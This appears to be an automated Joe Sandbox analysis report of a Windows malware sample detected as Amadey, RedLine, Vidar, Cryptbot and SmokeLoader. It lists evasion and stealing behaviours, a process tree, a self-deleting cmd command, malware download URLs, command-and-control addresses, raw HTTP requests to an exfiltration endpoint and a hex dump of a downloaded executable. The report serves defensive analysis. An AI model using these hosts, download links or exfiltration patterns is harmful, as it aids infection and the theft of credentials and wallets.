Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report QMn13jz6nj.exe

Overview

General Information

Sample Name:QMn13jz6nj.exe
Analysis ID:531737
MD5:c6e5298f945f91851744f96ee16412e5
SHA1:960d38c010136a907de89e32835608d92a200829
SHA256:f7b5a27355eafa5302a38a1e0adadcb619b6d42e7c1707a784297634a180a66f
Tags:Amadeyexe
Infos:

Most interesting Screenshot:

Detection

Amadey Cryptbot RedLine SmokeLoader Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Cryptbot
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to evade analysis by execution special instruction which cause usermode exception
Query firmware table information (likely to detect VMs)
Connects to many ports of the same IP (likely port scanning)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Hides threads from debuggers
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Del in CommandLine
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Checks for debuggers (devices)
Binary contains a suspicious time stamp
PE file contains more sections than normal
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • QMn13jz6nj.exe (PID: 2228 cmdline: "C:\Users\user\Desktop\QMn13jz6nj.exe" MD5: C6E5298F945F91851744F96EE16412E5)
    • QMn13jz6nj.exe (PID: 3416 cmdline: "C:\Users\user\Desktop\QMn13jz6nj.exe" MD5: C6E5298F945F91851744F96EE16412E5)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • A70A.exe (PID: 3340 cmdline: C:\Users\user\AppData\Local\Temp\A70A.exe MD5: 31F17AD58D02772DF14EFAC37D416CD7)
        • C169.exe (PID: 6276 cmdline: C:\Users\user\AppData\Local\Temp\C169.exe MD5: 5115E5DAB211559A85CD0154E8100F53)
          • conhost.exe (PID: 4788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • C169.exe (PID: 2256 cmdline: C:\Users\user\AppData\Local\Temp\C169.exe MD5: 5115E5DAB211559A85CD0154E8100F53)
        • D466.exe (PID: 6636 cmdline: C:\Users\user\AppData\Local\Temp\D466.exe MD5: DF13FAC0D8B182E4D8B9A02BA87A9571)
          • WerFault.exe (PID: 6708 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • AA02.exe (PID: 5976 cmdline: C:\Users\user\AppData\Local\Temp\AA02.exe MD5: 349A409711C0A8F53C5F90A993A621F2)
          • cmd.exe (PID: 4340 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\AA02.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • timeout.exe (PID: 1904 cmdline: timeout /t 5 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
        • B6B5.exe (PID: 6720 cmdline: C:\Users\user\AppData\Local\Temp\B6B5.exe MD5: CBC4BD8906093C0CCC55379319D65DB1)
          • B6B5.exe (PID: 3540 cmdline: C:\Users\user\AppData\Local\Temp\B6B5.exe MD5: CBC4BD8906093C0CCC55379319D65DB1)
        • D375.exe (PID: 6632 cmdline: C:\Users\user\AppData\Local\Temp\D375.exe MD5: CA16CA4AA9CF9777274447C9F4BA222E)
        • EE61.exe (PID: 5680 cmdline: C:\Users\user\AppData\Local\Temp\EE61.exe MD5: 97617914D6E8A6E3CBEE8A5E5FF39AA5)
          • EE61.exe (PID: 5344 cmdline: C:\Users\user\AppData\Local\Temp\EE61.exe MD5: 97617914D6E8A6E3CBEE8A5E5FF39AA5)
  • ddigjgj (PID: 6700 cmdline: C:\Users\user\AppData\Roaming\ddigjgj MD5: C6E5298F945F91851744F96EE16412E5)
    • ddigjgj (PID: 6464 cmdline: C:\Users\user\AppData\Roaming\ddigjgj MD5: C6E5298F945F91851744F96EE16412E5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000B.00000002.573313266.00000000012E2000.00000040.00020000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        0000001C.00000002.503480050.00000000005B1000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          00000017.00000000.476958517.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            0000001A.00000003.478772499.00000000008C0000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0000001A.00000003.478772499.00000000008C0000.00000004.00000001.sdmpJoeSecurity_CryptbotYara detected CryptbotJoe Security
                Click to see the 26 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                23.2.C169.exe.2f893c6.2.unpackSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
                • 0x155f6:$x1: https://cdn.discordapp.com/attachments/
                23.2.C169.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  16.2.C169.exe.3dd5e88.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    23.0.C169.exe.400000.10.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      16.2.C169.exe.3dd5e88.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        Click to see the 5 entries

                        Sigma Overview

                        System Summary:

                        barindex
                        Sigma detected: Suspicious Del in CommandLineShow sources
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\AA02.exe" & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\AA02.exe" & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\AA02.exe, ParentImage: C:\Users\user\AppData\Local\Temp\AA02.exe, ParentProcessId: 5976, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\AA02.exe" & exit, ProcessId: 4340

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Antivirus detection for URL or domainShow sources
                        Source: http://host-file-host-3.com/files/8723_1638191106_2017.exeAvira URL Cloud: Label: malware
                        Source: http://host-file-host-3.com/files/5311_1638303032_7343.exeAvira URL Cloud: Label: malware
                        Source: http://host-file-host-3.com/files/6096_1638289274_6885.exeAvira URL Cloud: Label: malware
                        Source: http://privacytoolzforyou-7000.com/downloads/toolspab3.exeAvira URL Cloud: Label: malware
                        Antivirus detection for dropped fileShow sources
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeAvira: detection malicious, Label: HEUR/AGEN.1144480
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen2
                        Multi AV Scanner detection for submitted fileShow sources
                        Source: QMn13jz6nj.exeVirustotal: Detection: 47%Perma Link
                        Multi AV Scanner detection for dropped fileShow sources
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeMetadefender: Detection: 25%Perma Link
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeReversingLabs: Detection: 57%
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeMetadefender: Detection: 37%Perma Link
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeReversingLabs: Detection: 78%
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeMetadefender: Detection: 42%Perma Link
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeReversingLabs: Detection: 85%
                        Source: C:\Users\user\AppData\Local\Temp\D466.exeMetadefender: Detection: 28%Perma Link
                        Source: C:\Users\user\AppData\Local\Temp\D466.exeReversingLabs: Detection: 51%
                        Machine Learning detection for sampleShow sources
                        Source: QMn13jz6nj.exeJoe Sandbox ML: detected
                        Machine Learning detection for dropped fileShow sources
                        Source: C:\Users\user\AppData\Local\Temp\D466.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\ddigjgjJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\D375.exeJoe Sandbox ML: detected
                        Source: 26.0.D375.exe.8e0000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                        Source: 26.0.D375.exe.8e0000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                        Source: 22.2.AA02.exe.5b0e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                        Source: 26.2.D375.exe.8e0000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                        Source: 22.3.AA02.exe.5e0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                        Source: 26.0.D375.exe.8e0000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                        Source: 26.0.D375.exe.8e0000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                        Source: 11.3.A70A.exe.3460000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_004070D0 CryptUnprotectData,LocalAlloc,LocalFree,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00407030 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00406D50 CryptUnprotectData,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00407360 lstrlen,CryptStringToBinaryA,lstrcatA,lstrcatA,lstrcatA,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_004047B0 _memset,CryptStringToBinaryA,CryptStringToBinaryA,

                        Compliance:

                        barindex
                        Detected unpacking (overwrites its own PE header)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeUnpacked PE file: 22.2.AA02.exe.400000.0.unpack
                        Source: QMn13jz6nj.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                        Source: C:\Users\user\AppData\Local\Temp\D466.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                        Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49759 version: TLS 1.2
                        Source: Binary string: profapi.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: msvcrt.pdbk source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: EE61.exe, 0000001F.00000000.557886650.0000000000400000.00000040.00000001.sdmp, EE61.exe, 0000001F.00000000.560895556.0000000000400000.00000040.00000001.sdmp, EE61.exe, 0000001F.00000002.568131871.0000000000400000.00000040.00000001.sdmp
                        Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001B.00000003.475546297.000000000488F000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: sechost.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: shcore.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: C:\yacopicugux28_yero\lub.pdb source: D466.exe, 00000013.00000000.431033742.0000000000416000.00000002.00020000.sdmp, D466.exe, 00000013.00000000.444432688.0000000000416000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.563965098.0000000000A40000.00000002.00020000.sdmp
                        Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: shell32.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: C:\yacopicugux28_yero\lub.pdb02`e@ source: D466.exe, 00000013.00000000.431033742.0000000000416000.00000002.00020000.sdmp, D466.exe, 00000013.00000000.444432688.0000000000416000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.563965098.0000000000A40000.00000002.00020000.sdmp
                        Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001B.00000003.493989773.0000000004B5D000.00000004.00000040.sdmp
                        Source: Binary string: Windows.Storage.pdbs|=M source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: =C:\xida\wimuhiwepivuz suv.pdb source: AA02.exe, 00000016.00000000.439528441.0000000000401000.00000020.00020000.sdmp
                        Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: sechost.pdbk source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: combase.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: C:\xida\wimuhiwepivuz suv.pdb source: AA02.exe, 00000016.00000000.439528441.0000000000401000.00000020.00020000.sdmp
                        Source: Binary string: efDC:\duluh.pdb02`e@ source: QMn13jz6nj.exe, 00000000.00000002.303636479.0000000000415000.00000002.00020000.sdmp, QMn13jz6nj.exe, 00000000.00000000.297090292.0000000000415000.00000002.00020000.sdmp, ddigjgj, 00000008.00000000.401591547.0000000000415000.00000002.00020000.sdmp, ddigjgj, 00000008.00000002.421779029.0000000000415000.00000002.00020000.sdmp
                        Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: msimg32.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: C:\duluh.pdb source: QMn13jz6nj.exe, 00000000.00000002.303636479.0000000000415000.00000002.00020000.sdmp, QMn13jz6nj.exe, 00000000.00000000.297090292.0000000000415000.00000002.00020000.sdmp, ddigjgj, 00000008.00000000.401591547.0000000000415000.00000002.00020000.sdmp, ddigjgj, 00000008.00000002.421779029.0000000000415000.00000002.00020000.sdmp
                        Source: Binary string: C:\tok\micuh.pdb source: B6B5.exe, 00000019.00000000.448563265.0000000000401000.00000020.00020000.sdmp, B6B5.exe, 00000019.00000002.490272528.0000000000401000.00000020.00020000.sdmp, B6B5.exe, 0000001C.00000000.478287829.0000000000401000.00000020.00020000.sdmp
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00401240 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00401050 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_004096C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00408360 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00405990 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,_strtok_s,PathMatchSpecA,CopyFileA,DeleteFileA,_strtok_s,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00409260 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_004094F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 4x nop then call 013E831Fh
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 4x nop then mov edx, dword ptr [ebp+08h]
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 4x nop then mov al, byte ptr [ecx]
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 4x nop then mov edx, dword ptr [ebp+08h]
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 4x nop then mov ax, word ptr [ecx]

                        Networking:

                        barindex
                        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                        Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49875 -> 185.215.113.35:80
                        Source: TrafficSnort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.3:49876 -> 185.215.113.35:80
                        System process connects to network (likely due to code injection or exploit)Show sources
                        Source: C:\Windows\explorer.exeDomain query: privacytoolzforyou-7000.com
                        Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                        Source: C:\Windows\explorer.exeDomain query: host-file-host-3.com
                        Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                        Connects to many ports of the same IP (likely port scanning)Show sources
                        Source: global trafficTCP traffic: 45.9.20.149 ports 42871,1,2,4,7,8
                        Source: global trafficHTTP traffic detected: GET /tratata.php HTTP/1.1Host: file-file-host4.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /sqlite3.dll HTTP/1.1Host: file-file-host4.comCache-Control: no-cacheCookie: PHPSESSID=sc69tg8a29f4pr0nv46ehfqbko
                        Source: global trafficHTTP traffic detected: POST /tratata.php HTTP/1.1Content-Type: multipart/form-data; boundary=----PZMY5PHVAI5F3EKFHost: file-file-host4.comContent-Length: 81665Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=sc69tg8a29f4pr0nv46ehfqbko
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:28 GMTContent-Type: application/x-msdos-programContent-Length: 1285856Connection: closeLast-Modified: Mon, 29 Nov 2021 13:05:06 GMTETag: "139ee0-5d1ed16faf7da"Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 20 3d 15 26 cf ba ee 2f 19 d3 60 ac 4f 9c ef f1 81 8e a1 4f 5b 97 45 f4 e8 76 69 7c ff 44 43 c7 9e 91 5b 41 d1 06 1c 81 dc 16 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 b8 78 cc d8 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 10 03 00 00 72 0c 00 00 00 00 00 00 d0 0f 00 00 20 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 10 17 00 00 04 00 00 5c 1b 14 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 03 00 f4 01 00 00 00 60 03 00 58 6f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 03 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 00 00 10 00 00 00 50 03 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 58 6f 0c 00 00 60 03 00 58 6f 0c 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 40 07 00 00 d0 0f 00 dd 28 07 00 00 76 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 